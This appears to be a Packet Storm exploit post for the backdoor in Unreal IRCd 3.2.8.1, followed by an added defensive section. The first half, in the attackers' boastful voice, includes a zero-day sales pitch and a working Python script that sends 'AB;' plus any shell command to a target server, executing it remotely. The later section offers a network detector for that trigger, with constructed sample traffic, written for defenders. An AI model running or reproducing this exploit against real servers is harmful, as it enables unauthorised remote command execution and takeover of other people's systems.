Unreal IRCD 3.2.8.1 Remote Backdoor

15 Jun 2010 00:00:00. Reported by Ac1db1tch3z. Type: packetstorm. Source: packetstormsecurity.com

Unreal IRCD 3.2.8.1 Remote Backdoor found in PhosphoricAc1d Exploit pac

Code
It seems as if our backdoor was found so we figured we can't sell this in the ac1db1tch3z
CANVAS pack (PhosphoricAc1d Exploit pack).

P.S. Since it took months and months for the community to find the system() exploit,
we still have a more complicated zerday unrealircd hack module. Please inquire
when our website is finished.

Brought to you by Ac1dB1tch3z: still using system() like it was 1992AD,
and still owning everyone with it. Thanks.

```
$ stat ABunreal.py
File: `ABunreal.py'
Size: 830 Blocks: 8 IO Block: 4096 regular file
Device: fd02h/64770d Inode: 16891994 Links: 1
Access: (0777/-rwxrwxrwx) Uid: ( 1003/ ag) Gid: ( 1010/ ag)
Access: 2010-04-05 14:26:14.000000000 -0400
Modify: 2009-11-10 00:04:33.000000000 -0500
Change: 2010-04-05 14:26:59.000000000 -0400
```

```python
#!/usr/bin/env python
# Ac1db1tch3z 09

import sys
import socket
import struct

def injectcode(host, port, command):

    host1 = host
    port1 = int(port)
    cmd = command

    print "!#@#@! Ac1db1tch3z is just Unreal #@!#%%\n"
    print "- Attacking %s on port %d"%(host1,port1)
    print "- sending command: %s"%cmd

    packet = "AB" +";"+ cmd + ";"+"\n"

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        s.connect((host1, port1))
    except socket.error:
        print "No connection..."
        return 0
    s.sendall(packet)
    blah = s.recv(5000)
    print blah
    s.close()

if __name__ == "__main__":
    if len(sys.argv) == 1:
        print "Usage:", sys.argv[0], "<target host> <target port> <command>"
        print
        sys.exit(1)
    else:
        injectcode(sys.argv[1],sys.argv[2],sys.argv[3])
```
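For defenders, the packet the script builds (`AB;` + command + `;` + newline) gives a simple network signature. The following detector is an added example, not part of the original post or of UnrealIRCd; the class and function names are hypothetical, the sample traffic is constructed, and it assumes the trigger sits at the start of a client-to-server line as in the script above.

```python
import re

# Trigger format taken from the script above: "AB" + ";" + cmd + ";" + "\n".
# RFC 1459 commands are letters or three digits, so "AB;" never starts a valid line.
TRIGGER = re.compile(rb"^AB;(?P<cmd>.*?);?$")
MAX_PENDING = 4096  # cap on buffered bytes for an unterminated line (assumed limit)


class BackdoorTriggerDetector:
    """Reassembles one client-to-server byte stream into lines and flags triggers."""

    def __init__(self):
        self._buf = b""
        self.line_no = 0

    def feed(self, segment):
        """Feed one TCP payload; return [(line_no, command_text)] for completed lines."""
        self._buf += segment
        *lines, self._buf = self._buf.split(b"\n")
        self._buf = self._buf[:MAX_PENDING]  # keep the head, where the prefix would be
        hits = []
        for raw in lines:
            self.line_no += 1
            m = TRIGGER.match(raw.rstrip(b"\r"))
            if m:
                hits.append((self.line_no, m.group("cmd").decode("latin-1")))
        return hits


# Constructed sample: client-to-server payloads as a sensor might capture them.
SAMPLE_SEGMENTS = [
    b"NICK alice\r\nUSER alice 0 * :Alice\r\n",
    b"PRIVMSG #ops :did you see the AB;foo; thing?\r\n",  # mid-line text, not a trigger
    b"AB;echo constr",                                    # trigger split across segments
    b"ucted-sample;\n",
    b"QUIT :bye\r\n",
]


def scan(segments):
    """Run one detector over an ordered list of payloads from a single connection."""
    det = BackdoorTriggerDetector()
    return [hit for seg in segments for hit in det.feed(seg)]


if __name__ == "__main__":
    for line_no, cmd in scan(SAMPLE_SEGMENTS):
        print(f"line {line_no}: backdoor trigger, command={cmd!r}")
```

The recovered command text is worth logging alongside the source address, since it shows what the sender tried to run on the IRC host.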
